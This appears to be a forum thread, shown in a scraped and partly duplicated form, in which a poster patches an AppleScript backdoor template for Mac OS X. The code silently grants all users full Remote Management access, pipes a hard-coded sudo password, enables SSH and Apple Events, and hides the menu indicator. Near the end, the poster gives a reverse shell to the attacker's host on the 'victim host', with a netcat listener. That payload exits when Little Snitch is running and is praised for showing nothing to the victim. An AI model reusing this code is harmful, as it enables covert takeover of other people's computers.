set ip_addresses to (do shell script "IPaddress_en0=$(ifconfig en0 2>/dev/null | head -n 3 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' ) && echo \"${IPaddress_en0}\"") & " " & (do shell script "IPaddress_en1=$(ifconfig en1 2>/dev/null | head -n 3 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' ) && echo \"${IPaddress_en1}\"") & " " & (do shell script "router_IPaddress=$( arp -a | head -n 1 | sed -e 's/^.* (//' -e 's/).*$//' ) && echo \"${router_IPaddress}\"")
Basicly
- change all Head -n 2 to head -n 3 (because head -n2 show only inet6 adress ip)
- Add a Head -n 1 to the arp -a
Also note that KickStart of ARDAgent need to be run as root or sudo !!
You should change all these lines
CODE
-- Disable the Remote Management menu extra.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -clientopts -setmenuextra -menuextra no"
--For Leopard
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate"
-- Allow access for all users and give all users full access.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -allowAccessFor -allUsers -privs -all"
-- Start the Remote Management service.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -clientopts -setmenuextra -menuextra no"
--For Leopard
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate"
-- Allow access for all users and give all users full access.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -allowAccessFor -allUsers -privs -all"
-- Start the Remote Management service.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate"
So if you knwo the admin/root user password or if you have created a new admin/root user by
CODE
-- Disable the Remote Management menu extra.
do shell script "echo 'password' | sudo -S /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -clientopts -setmenuextra -menuextra no"
--For Leopard
do shell script "echo 'password' | sudo -S /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate"
-- Allow access for all users and give all users full access.
do shell script "echo 'password' | sudo -S /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -allowAccessFor -allUsers -privs -all"
-- Start the Remote Management service.
do shell script "echo 'password' | sudo -S /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate"
do shell script "echo 'password' | sudo -S /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -clientopts -setmenuextra -menuextra no"
--For Leopard
do shell script "echo 'password' | sudo -S /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate"
-- Allow access for all users and give all users full access.
do shell script "echo 'password' | sudo -S /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -allowAccessFor -allUsers -privs -all"
-- Start the Remote Management service.
do shell script "echo 'password' | sudo -S /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate"
or just SUDO if this script is run as root
NOTE that on LEOPARD systemsetup isn't in
QUOTE
/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/
but in
QUOTE
/usr/sbin/
So this part has to be modified from
CODE
on enable_ssh()
if debug then log_event("enable_ssh")
try
if i_am_an_admin then
--This *should* work from any admin account, without sudo or root, for any version of OS X which
--includes ARD Client (server) such as 10.3, 10.4 and 10.5.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
end if
end try
if debug then log_event("enable_ssh")
try
if i_am_an_admin then
--This *should* work from any admin account, without sudo or root, for any version of OS X which
--includes ARD Client (server) such as 10.3, 10.4 and 10.5.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
end if
end try
to
CODE
if OSX_version_number_minor as number ≥ 5 then --For Leopard
do shell script "/usr/sbin/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/usr/sbin/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/usr/sbin/systemsetup -setrestartpowerfailure on &"
do shell script "/usr/sbin/systemsetup -setrestartfreeze on &"
do shell script "/usr/sbin/systemsetup -setremoteappleevents on &"
else if OSX_version_number_minor as number ≤ 4 then --For Tiger and prior
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
end if
do shell script "/usr/sbin/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/usr/sbin/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/usr/sbin/systemsetup -setrestartpowerfailure on &"
do shell script "/usr/sbin/systemsetup -setrestartfreeze on &"
do shell script "/usr/sbin/systemsetup -setremoteappleevents on &"
else if OSX_version_number_minor as number ≤ 4 then --For Tiger and prior
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
end if
So for 10.5.5 and later change the enable_ssh like this
CODE
on enable_ssh()
if debug then log_event("enable_ssh")
try
if i_am_an_admin then
if OSX_version_number_minor as number ≥ 5 then --For Leopard
do shell script "/usr/sbin/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/usr/sbin/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/usr/sbin/systemsetup -setrestartpowerfailure on &"
do shell script "/usr/sbin/systemsetup -setrestartfreeze on &"
do shell script "/usr/sbin/systemsetup -setremoteappleevents on &"
else if OSX_version_number_minor as number ≤ 4 then --For Tiger and prior
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
end if
end if
end try
if i_have_root_access then
try
if OSX_version_number_minor as number ≥ 5 then --For Leopard
do shell script "/usr/bin/sudo /usr/sbin/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/usr/bin/sudo /usr/sbin/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/usr/bin/sudo /usr/sbin/systemsetup -setrestartpowerfailure on &"
do shell script "/usr/bin/sudo /usr/sbin/systemsetup -setrestartfreeze on &"
do shell script "/usr/bin/sudo /usr/sbin/systemsetup -setremoteappleevents on &"
else if OSX_version_number_minor as number ≤ 4 then --For Tiger and prior
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
end if
end try
try
--This handler needs root for everything past this point! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
--Note, this also opens port 22 in the default OS X firewall
do shell script "/usr/bin/sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist &"
else if OSX_version_number_minor as number ≥ 2 and OSX_version_number_minor as number ≤ 3 then --For Jaguar and Panther
do shell script "/usr/bin/sudo mv /private/etc/xinetd.d/ssh /private/etc/xinetd.d/ssh.AStht && /usr/bin/sudo sed -e 's/disable = .*$/disable = no/' /private/etc/xinetd.d/ssh.AStht > /private/etc/xinetd.d/ssh && /usr/bin/sudo touch -r /private/etc/xinetd.d/ssh.AStht /private/etc/xinetd.d/ssh 2>/dev/null"
do shell script "/usr/bin/sudo /sbin/service ssh start"
else --For Puma and Cheetah
--Still need to also open port 22 in the firewall (ipfw)!
do shell script "/usr/bin/sudo sed -e 's/SSHSERVER=-NO-/SSHSERVER=-YES-/' /etc/hostconfig > /var/tmp/hostconfig && /usr/bin/sudo mv /etc/hostconfig /etc/hostconfig.AStht && /usr/bin/sudo mv /var/tmp/hostconfig /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
do shell script "grep 'SSHSERVER=-YES-' /etc/hostconfig || /usr/bin/sudo echo 'SSHSERVER=-YES-' >> /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
do shell script "/usr/bin/sudo /usr/sbin/sshd &"
end if
end try
end if
end enable_ssh
if debug then log_event("enable_ssh")
try
if i_am_an_admin then
if OSX_version_number_minor as number ≥ 5 then --For Leopard
do shell script "/usr/sbin/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/usr/sbin/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/usr/sbin/systemsetup -setrestartpowerfailure on &"
do shell script "/usr/sbin/systemsetup -setrestartfreeze on &"
do shell script "/usr/sbin/systemsetup -setremoteappleevents on &"
else if OSX_version_number_minor as number ≤ 4 then --For Tiger and prior
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
end if
end if
end try
if i_have_root_access then
try
if OSX_version_number_minor as number ≥ 5 then --For Leopard
do shell script "/usr/bin/sudo /usr/sbin/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/usr/bin/sudo /usr/sbin/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/usr/bin/sudo /usr/sbin/systemsetup -setrestartpowerfailure on &"
do shell script "/usr/bin/sudo /usr/sbin/systemsetup -setrestartfreeze on &"
do shell script "/usr/bin/sudo /usr/sbin/systemsetup -setremoteappleevents on &"
else if OSX_version_number_minor as number ≤ 4 then --For Tiger and prior
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
end if
end try
try
--This handler needs root for everything past this point! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
--Note, this also opens port 22 in the default OS X firewall
do shell script "/usr/bin/sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist &"
else if OSX_version_number_minor as number ≥ 2 and OSX_version_number_minor as number ≤ 3 then --For Jaguar and Panther
do shell script "/usr/bin/sudo mv /private/etc/xinetd.d/ssh /private/etc/xinetd.d/ssh.AStht && /usr/bin/sudo sed -e 's/disable = .*$/disable = no/' /private/etc/xinetd.d/ssh.AStht > /private/etc/xinetd.d/ssh && /usr/bin/sudo touch -r /private/etc/xinetd.d/ssh.AStht /private/etc/xinetd.d/ssh 2>/dev/null"
do shell script "/usr/bin/sudo /sbin/service ssh start"
else --For Puma and Cheetah
--Still need to also open port 22 in the firewall (ipfw)!
do shell script "/usr/bin/sudo sed -e 's/SSHSERVER=-NO-/SSHSERVER=-YES-/' /etc/hostconfig > /var/tmp/hostconfig && /usr/bin/sudo mv /etc/hostconfig /etc/hostconfig.AStht && /usr/bin/sudo mv /var/tmp/hostconfig /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
do shell script "grep 'SSHSERVER=-YES-' /etc/hostconfig || /usr/bin/sudo echo 'SSHSERVER=-YES-' >> /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
do shell script "/usr/bin/sudo /usr/sbin/sshd &"
end if
end try
end if
end enable_ssh
Hmm for the reverse SSH I found few minor bugs.
And there a really simpler solution :)
On the victim host just do
And on your machine always have a listen process like this
So you should surely replace all this code in ASTtemplate :
Hmm one error there, add "Head -n 1" and remove the grep -v [:alpha:] here
So you could replace all this by just
remember on your own Host you have to run
with this all you type are pipe to bash on the victim computer and the answer is sent back to you. Nothing is writtent/shown on the victim computer :)
I'll surely open a new thread with few reverse shell techniques :)
And there a really simpler solution :)
On the victim host just do
CODE
bash -i >& /dev/tcp/YourHost/YourPort 0>&1
And on your machine always have a listen process like this
CODE
nc -l -vvv YourPort
So you should surely replace all this code in ASTtemplate :
CODE
#!/bin/bash
[ -n \"$( ps -axww | grep -i 'lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch' | grep -v grep )\" ] && exit 0
address=$( host " & masters_DDNS_address & " | sed -e 's/^.*address //' -e 's/ .*//' | grep -v [:alpha:] )
exec 6<>/dev/tcp/${address}/" & masters_netcat_port & " || exit 0
id >&6
echo -n \"${USER}@${HOSTNAME} > \" >&6
cat <&6 | while read input
do
$input >&6 2>&6
echo -n \"${USER}@${HOSTNAME} > \" >&6
done
exit 0
[ -n \"$( ps -axww | grep -i 'lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch' | grep -v grep )\" ] && exit 0
address=$( host " & masters_DDNS_address & " | sed -e 's/^.*address //' -e 's/ .*//' | grep -v [:alpha:] )
exec 6<>/dev/tcp/${address}/" & masters_netcat_port & " || exit 0
id >&6
echo -n \"${USER}@${HOSTNAME} > \" >&6
cat <&6 | while read input
do
$input >&6 2>&6
echo -n \"${USER}@${HOSTNAME} > \" >&6
done
exit 0
Hmm one error there, add "Head -n 1" and remove the grep -v [:alpha:] here
CODE
address=$( host " & masters_DDNS_address & " | sed -e 's/^.*address //' -e 's/ .*//' | grep -v [:alpha:] )
So you could replace all this by just
CODE
#!/bin/bash
[ -n \"$( ps -axww | grep -i 'lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch' | grep -v grep )\" ] && exit 0
address=$( host " & masters_DDNS_address & " | head -n 1 | sed -e 's/^.*address //' -e 's/ .*//' )
bash -i >& /dev/tcp/${address}/" & masters_netcat_port & " 0>&1
[ -n \"$( ps -axww | grep -i 'lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch' | grep -v grep )\" ] && exit 0
address=$( host " & masters_DDNS_address & " | head -n 1 | sed -e 's/^.*address //' -e 's/ .*//' )
bash -i >& /dev/tcp/${address}/" & masters_netcat_port & " 0>&1
remember on your own Host you have to run
CODE
nc -l -vvv yourport
with this all you type are pipe to bash on the victim computer and the answer is sent back to you. Nothing is writtent/shown on the victim computer :)
I'll surely open a new thread with few reverse shell techniques :)
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.